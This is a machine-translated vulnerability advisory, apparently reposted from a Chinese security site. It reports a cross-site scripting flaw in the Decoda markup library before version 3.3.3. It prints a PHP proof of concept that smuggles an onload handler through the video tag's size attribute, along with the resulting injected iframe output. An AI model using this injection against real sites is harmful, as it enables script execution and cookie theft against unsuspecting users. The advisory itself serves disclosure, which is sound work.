Decoda cross-site scripting vulnerability-vulnerability warning-the black bar safety net

2012-05-14T00:00:00
ID MYHACK58:62201233873
Type myhack58
Reporter 佚名
Modified 2012-05-14T00:00:00

Description

Decoda 3.3.3 previous version in the presence of cross-site scripting vulnerability derived from the user supplied input is not properly filtered.

An attacker can exploit the vulnerability in the affected site the context of the unsuspecting user on the browser to execute arbitrary script code, steal cookie-based authentication credentials and then initiate other attacks.

The current vendor has not provided this vulnerability-related patch or upgrade the program, recommend the use of this software users follow the manufacturer's home page to get the latest version

Can be used under the proof-of-concept attack:

<? php

include '../decoda/Decoda.php';

$code = new Decoda();

$code->addFilter(new VideoFilter()); ?& gt;

<? php

$decoda_markup = '[video="youtube" size="small"]"';

$decoda_markup .= 'onload="alert(\'RedTeam Pentesting XSS\');" id="[/video]';

$code->reset($decoda_markup);

echo $code->parse();

?& gt;

This results in the following output (whitespace adjusted):

<iframe src="http:// www.xxxx.com /embed/"; onload="alert('RedTeam

Pentesting XSS');" id="" width="5 6 0" height="3 1 5"

frameborder="0"></iframe>

Excerpted from the 9 0' s Blog